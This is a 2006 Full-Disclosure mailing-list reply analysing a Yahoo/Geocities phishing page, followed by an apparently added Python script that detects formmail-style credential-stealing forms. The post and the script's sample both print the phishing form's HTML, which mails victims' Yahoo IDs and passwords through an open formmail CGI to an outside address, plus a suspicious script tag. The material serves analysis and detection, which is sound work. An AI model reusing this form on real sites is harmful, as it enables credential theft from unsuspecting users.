Full Disclosure mailing list archives
Re: Yahoo/Geocities possible exploit/vulnerability
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Tue, 15 Aug 2006 13:01:27 +1200
Jain, Siddhartha wrote:
> I was logged onto Yahoo Messenger (version 7.5 on WinXP SP2 Pro), when I got a message from a friend's ID:
>
> Pxxxx Bxxxxx (8/14/2006 4:25:50 PM): ---> www.geocities.com/now_thats_funny_210/
>
> Clicking on the link took me to a page with the URL as above in the address bar and a yahoo/geocities page that asks for username and password. On entering the username and password, the next page displayed was my photo album on yahoo but the URL in the address bar still remained the same as above!!
D'oh -- you've been phished! Double-D'oh -- you announced it on Full-Disclosure!!

The URL you were sent is a phishing page. The form submission code looks like the following (brain-damaged "smart" HTML rendering MUAs may start to suck about here -- if that's yours, get a better one):

<legend>Login Form</legend>
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="whoaenator () gmail com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos">
[...]

Basically, your Yahoo ID and password were sent to an open "formmail" CGI at fiberbit.net which sent those details (plus some other stuff based on reverse DNS, etc. of the apparent IP submitting the form) via Email to whoaenator () gmail com and then the form-processing CGI redirected your browser to your "real" Yahoo! Photos page, http://photos.yahoo.com/ph//my_photos. If it did this without prompting you for login (as it did for me) I guess that means you had an already active Yahoo! session in your browser.
> Next thing I noticed that Yahoo Messenger had frozen.
My guess here is (thankfully I'm not a YIM expert) that YIM only allows one login per ID and kicks _old_ ones when a new session is initiated from an already active ID. Thus getting logged out of YIM would mean that the bot picking up and processing whoaenator () gmail com's Emails had logged into YIM, presumably to send messages like the one you got to your whole contact list. Lather, rinse, repeat...
> I changed my yahoo password and un-installed Yahoo Messenger.
Damage already done though, methinks. I mean, good for changing your password, but as all I can see this doing for now is spimming that link, the damage is done. Of course, changing your password means that they cannot re-use your credentials in future, should they have recorded them for possible future use.

I suspect that this was also supposed to try to exploit some or other recent-ish IE security vulnerability, but due to incompetence on the part of the person setting it up, they fluffed this aspect of the intended "attack". I mean, WTF otherwise is the explanation of this from the middle of the "now_thats_funny_210" page?

<script language='javascript' src='http://127.0.0.1:1894/js.cgi?pcaw&r=4886'></script>
> When I asked my friend about the message, he said he didn't send the message but received a similar message from his wife in the morning who hadn't sent it either.
They've both already been hit -- be nice and strongly commend them to change their passwords and then trace it back from his wife to whoever she got it from, et seq...

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
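The pattern Nick dissects above (a login form whose ACTION is a third-party formmail CGI, with hidden fields naming the mail recipient and the page to bounce the victim to afterwards) is mechanical enough to check for automatically. The following is an added example, not code from the original post or from Yahoo/Geocities: it parses the forms on a page and flags ones that post credentials off-site or carry formmail-style recipient/redirect fields. The phishing sample is constructed from the form fields quoted in the post (the username/password inputs stand in for the elided "[...]" part), and the lists of hidden-field names are an assumption based on common formmail scripts.

```python
"""Spot formmail-style credential-exfiltration forms like the one on the
Geocities page discussed above: the form POSTs to a third-party mail-relay
CGI, names the recipient in a hidden field, and redirects the victim to the
real site afterwards.

Added example, not code from the original post. The phishing sample below is
constructed from the form fields quoted in the post; the field-name lists are
an assumption based on common formmail-style scripts.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names that tell a formmail CGI where to mail the submission
# and where to send the browser afterwards (assumed list).
MAIL_FIELDS = {"mail_to", "recipient", "mailto", "email_to", "sendto"}
REDIRECT_FIELDS = {"next_page", "redirect", "thankyou_url", "return_url"}


class FormCollector(HTMLParser):
    """Collect every <form> on a page together with the <input>s inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # tag names arrive lowercased
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def classify_form(page_url, form):
    """Return a finding dict for one collected form."""
    page_host = (urlparse(page_url).hostname or "").lower()
    # A relative ACTION stays on the page's own host.
    action_host = (urlparse(form["action"]).hostname or page_host).lower()
    inputs = form["inputs"]
    hidden = [i for i in inputs if i.get("type", "").lower() == "hidden"]
    has_password = any(i.get("type", "").lower() == "password" for i in inputs)
    exfil_to = [i.get("value", "") for i in hidden if i.get("name", "").lower() in MAIL_FIELDS]
    redirect = [i.get("value", "") for i in hidden if i.get("name", "").lower() in REDIRECT_FIELDS]

    reasons = []
    if action_host != page_host:
        reasons.append(f"form posts off-site to {action_host}")
    if exfil_to:
        reasons.append("hidden field names a mail recipient: " + ", ".join(exfil_to))
    if redirect:
        reasons.append("hidden field redirects after submit: " + ", ".join(redirect))
    if has_password and action_host != page_host:
        reasons.append("password field submitted to a foreign host")

    # Either indicator alone is enough: a hidden recipient means the CGI mails
    # the submission somewhere, and credentials leaving the origin is the phish.
    suspicious = bool(exfil_to) or (has_password and action_host != page_host)
    return {
        "action_host": action_host,
        "suspicious": suspicious,
        "exfil_to": exfil_to,
        "redirect": redirect,
        "reasons": reasons,
    }


def scan(page_url, html):
    """Parse the page and classify every form on it."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    return [classify_form(page_url, f) for f in parser.forms]


# Constructed sample: the fields quoted in the post plus the credential inputs
# that the quoted snippet elides with "[...]".
PHISH_URL = "http://www.geocities.com/now_thats_funny_210/"
PHISH_HTML = """
<legend>Login Form</legend>
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="whoaenator () gmail com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos">
<INPUT TYPE="text" NAME="login">
<INPUT TYPE="password" NAME="passwd">
<INPUT TYPE="submit" VALUE="Sign In">
</FORM>
"""

# Constructed benign sample: same-origin login form, no hidden relay fields.
BENIGN_URL = "https://login.example.com/"
BENIGN_HTML = ('<form method="post" action="/login"><input type="text" name="user">'
               '<input type="password" name="pass"></form>')

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        for finding in scan(url, html):
            print(url, "SUSPICIOUS" if finding["suspicious"] else "ok", finding["reasons"])
```

Run against the Geocities sample, the scan reports the foreign ACTION host, the hidden recipient and the Next_Page bounce to photos.yahoo.com, which is exactly the chain described above; the same-origin login form produces no finding. An off-site ACTION alone is only a weak signal (legitimate sites do farm logins out to an SSO host), which is why the verdict keys on a hidden recipient field or on a password field leaving the origin.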
Current thread:
- Yahoo/Geocities possible exploit/vulnerability Jain, Siddhartha (Aug 14)
- Re: Yahoo/Geocities possible exploit/vulnerability Nick FitzGerald (Aug 14)
- <Possible follow-ups>
- RE: Yahoo/Geocities possible exploit/vulnerability Jain, Siddhartha (Aug 14)
- Re: Yahoo/Geocities possible exploit/vulnerability Schanulleke (Aug 14)
- RE: Yahoo/Geocities possible exploit/vulnerability Nick FitzGerald (Aug 15)
- Re: Yahoo/Geocities possible exploit/vulnerability crazy frog crazy frog (Aug 15)